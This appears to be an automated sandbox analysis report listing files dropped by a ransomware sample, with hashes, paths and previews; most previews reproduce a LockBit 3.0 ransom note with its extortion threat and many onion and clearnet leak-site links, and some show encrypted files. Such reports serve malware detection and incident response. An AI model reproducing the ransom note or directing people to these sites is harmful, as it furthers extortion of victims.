                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.976260697684127
                Encrypted:false
                SSDEEP:192:muJeD5yH5FXGh0mm9pLhOibpc3msrFnRqxpo:4DYHGE9N8ib1gFnIs
                MD5:4CB55CF645303AA1A4E2F04931CBF6E7
                SHA1:75DE140DC682D2CA73EE3DF00B5B7B9245205DB8
                SHA-256:0AB65C698751829DA13ADF0427F2ED3DB0B740FAF87DEB2A9D0AAD45F0265997
                SHA-512:10264BC249C2A9D06976BF43F1A02CF92948D5F7D01B917DFC9CDFFCCF64AFEFA5D4956DBE4A09E6FB1A0A79A42245DBE8BAEE04D2D7E3EEDBB62887EA75DE69
                Malicious:false
                Preview:-z.!K..O..#mr._...4.D.@.aH....Xr...z......a..,A'zfR.....4.0..m.$......`p..Zd.q....6..`\T~l.9.......!.q.\...^.e=_.`3?kr..:E.{t.N_SE.=..4...f.o..o...ELe:[.d...6.Xa*..9.bF.....b.Z..B.L..K....M....hF.....AQ.:.7...[..^.i/.G.........zu.z.w.....>....s.x.J..C...;...5E.jB.R...j....pP.....\T\..>....h.G.Uz.Jl.A...9}.4ztUz...m..?.s.p...R+.........N.~..w.\...........S..!.w.......5.y.....|@...j.[. .........L.5Pj....?..~....E.|...)..BY....L.....Y,|..y..h.o_.....L......z1:F..r...$.;.9..Vm*kQ.i..8L(.V..=...j..E.2F.[..(..1...Y...f.R.|..[...s...*......`...../.~.T.T......4jk.74.9T(k..g........u......d..$.4......k.mK@5.....s.~..ZQ..V... .....".....I.:.w...>.[.KZ.b.......Y:.....h.F..y....V...an..L..B.Uk:.9...1....a....2f.V@9.9.-.F!jz..V.%1j..>.>...).\/.......P..$..../{7.....h0.F@...qsC..."&........#....t.....6T..7K.1...aC. r.1...../.............pw.W(m...b......0.....B.D..1Q..=ZV.i.M.C.....'....k...f..`O.uw......l.......\......1..4]W....D..)..%..4}. .

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\ShareCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.9795404624756205
                Encrypted:false
                SSDEEP:192:8pznrlv4NqbFJmfqbbmQQvj/efbXVb4DMf3o116o1hsQ/p3dJVo:8NnxgNK8A1Qv6fD14AfY1Z1r/p3Hu
                MD5:1099D543215276C099E6BA60E01E538E
                SHA1:1FA8829EECBCA6CDACC4CD36625F74258F31C696
                SHA-256:CF84643895F60634993A46D672437519A9BA80AB44EC0CA14AC83B10AC1BAC75
                SHA-512:DC8D0011AA0A26DABB0BD3D53A84DC122C6A5B42025603A125AAC1111B4502654BBB9F25D59D489D9C81D1F1077A8C3EC4CA3C13AE3D9FC2D7BAC644BF437974
                Malicious:false
                Preview:.KN+...|..p..._.m...DILh.....9....Kc....[Q.".l{D38..w)Bl.bf...1w....-q-.7..^...k[.N..f._..M.(.!...{].Y.+4X.../...V~...e^I*..H....JF.....y.r._l.t.8..R."......?...:A`..A.Bx.Lpt.dw.'...M.!U%....bt#tj.&.......j.....po....")...Fz~e....AU.b.V......B0..Q..u...(.[.+.s2....W'..q...D.q.?.}b.BJ...*...X&..l..-....]..Y._F.7..[eY'..O]..7p.t...z.E.....B.........#.C.{.."..5.b.M.e.....4e.....'..c. ,k'.....SE.....N..w.v.H`..oi.SQ.G.\.+S8.s,.0..a.x..-..T.V.=...g...8.MA.......I~;C.>..f6.n?W.0A$.Z...v;$....%...?I.....&.!.e@.?.......}..G....Y.4..<X.9M.rN.J.;..M.pl.!.+.....K..w>...2.......}.T.cC.?M0".0...g.x...f....B...N..p.w.T>q.S.P....2j.Zq.....0B..,.....g...Ubn.'...M......!..CC...G.....P&#....&..5.C..C.IL..........ng.gUb.H...U.Gj].b.n...f..6a.l....3<?..|..E=E...G+u.!.0.T..w.@.+..Q..,.dv9W..o6.......}"i.*,.N..L*#a..C.<.TQ..R.{P.Ndn.....z(.3..R..=R<+..`........v.../+.H.COt.:n...C..\..&..X.i...?.6.q|.~..L....tX..@S*.L....ZD@rc7.=.K.g..(o.....T.p...w...l.U:.:&....0.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal 